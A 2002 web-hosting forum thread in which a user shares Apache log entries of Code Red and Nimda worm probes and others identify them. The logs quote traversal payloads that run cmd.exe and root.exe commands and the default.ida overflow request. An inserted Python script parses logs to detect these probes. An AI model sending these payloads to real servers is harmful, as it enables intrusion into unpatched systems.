Web Hosting Talk

Strange attacks


archangel777
04-08-2002, 02:43 PM
I was checking my apache logs on my Linux servers, and I'm getting the following on each of them:

785: /scripts/..%255c../winnt/system32/cmd.exe
785: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
767: /scripts/..%5c../winnt/system32/cmd.exe
767: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
439: /scripts/root.exe
439: /scripts/root.exe?/c+dir
434: /MSADC/root.exe
434: /MSADC/root.exe?/c+dir
424: /c/winnt/system32/cmd.exe
424: /c/winnt/system32/cmd.exe?/c+dir
414: /d/winnt/system32/cmd.exe
414: /d/winnt/system32/cmd.exe?/c+dir
402: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
402: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
399: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
399: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
396: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
396: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
394: /scripts/..%c1%1c../winnt/system32/cmd.exe
394: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
391: /scripts/winnt/system32/cmd.exe
391: /scripts/winnt/system32/cmd.exe?/c+dir
389: /scripts/..%c0%af../winnt/system32/cmd.exe
389: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
384: /scripts/..%c1%9c../winnt/system32/cmd.exe
384: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
378: /scripts/..%252f../winnt/system32/cmd.exe
378: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
23: /default.ida
23: /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

Anyone familiar with these attacks? I've been getting them for a long time. It's really ticking me off.
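
The entries above are worm probes aimed at IIS (traversal to cmd.exe, root.exe, and the default.ida overflow), so on Apache they only generate 404s. If you want to count them rather than read them by hand, here is an added example (not the poster's code) that parses Apache combined-log lines, double-decodes the path so tricks like %255c become visible, and tallies hits per client IP and signature. The log lines and IPs are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines modelled on the paths in the post above
# (not the poster's real log; the client IPs and timestamps are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [08/Apr/2002:14:10:01 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
10.0.0.5 - - [08/Apr/2002:14:10:02 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280
10.0.0.9 - - [08/Apr/2002:14:11:00 -0400] "GET /default.ida?NNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 300
10.0.0.7 - - [08/Apr/2002:14:12:00 -0400] "GET /index.html HTTP/1.1" 200 1024
"""

# client ip, method, request path and status code from a combined-log line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3}) ')

# Signatures taken from the entries in the post: traversal to cmd.exe,
# the root.exe copy, and the default.ida overflow request.
SIGNATURES = {
    "cmd.exe traversal": re.compile(r"/winnt/system32/cmd\.exe", re.I),
    "root.exe request": re.compile(r"/root\.exe", re.I),
    "default.ida overflow": re.compile(r"^/default\.ida\?", re.I),
}

def decode_path(path):
    """Decode two layers of %-encoding so %255c (-> %5c -> backslash) shows up."""
    return unquote(unquote(path))

def classify(line):
    """Return (client_ip, signature_label, status) for a probe, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, path, status = m.groups()
    decoded = decode_path(path)
    for label, sig in SIGNATURES.items():
        if sig.search(decoded):
            return ip, label, int(status)
    return None

def scan(log_text):
    """Tally probe hits per (client_ip, signature_label) across a log excerpt."""
    hits = {}
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            ip, label, _status = result
            hits[(ip, label)] = hits.get((ip, label), 0) + 1
    return hits

if __name__ == "__main__":
    for (ip, label), count in sorted(scan(SAMPLE_LOG).items()):
        print(f"{ip:15} {label:22} {count}")
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents; a non-404 status next to one of these signatures is the line worth looking at.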

billyjoe
04-08-2002, 03:05 PM
That's the Code Red worm. Nothing to worry about for Linux machines.

Here's some more info.
http://www.apacheweek.com/features/codered

richardparry
04-08-2002, 03:24 PM
I used to have a development 2k Server box that got hacked that way. I didn't have any service packs installed and I got the Nimda virus from it.

Once I installed SP2 and tried it out myself it didn't work anymore.

I tried it for myself and you can browse any drive on the server! Scary stuff! One of many Windows security holes!

StevenG
04-09-2002, 06:41 AM
Originally posted by billyjoe
That's the Code Red worm. Nothing to worry about for Linux machines.

Here's some more info.
http://www.apacheweek.com/features/codered

I shudder to think about the security of windoze boxes; there's a lot of Code Red stuff going around. Thank god for Linux, I say.

okihost
04-09-2002, 11:57 AM
So nice to have peace of mind and be able to sleep :sleeping: at night..

Linux = :love:

Winblows= :puke:

RackMy.com
04-09-2002, 12:08 PM
None of our Windows boxes were affected by Nimda or Code Red :) So there :p

[ok, I had to say it]

bitserve
04-09-2002, 07:49 PM
Originally posted by RackMy.com
None of our Windows boxes were affected by Nimda or Code Red :) So there :p

[ok, I had to say it]

You go! :)

I read that there is a big exploit in Apache on Microsoft too, for versions prior to 1.3.24. For this one time, it's good that almost everyone is using IIS. :)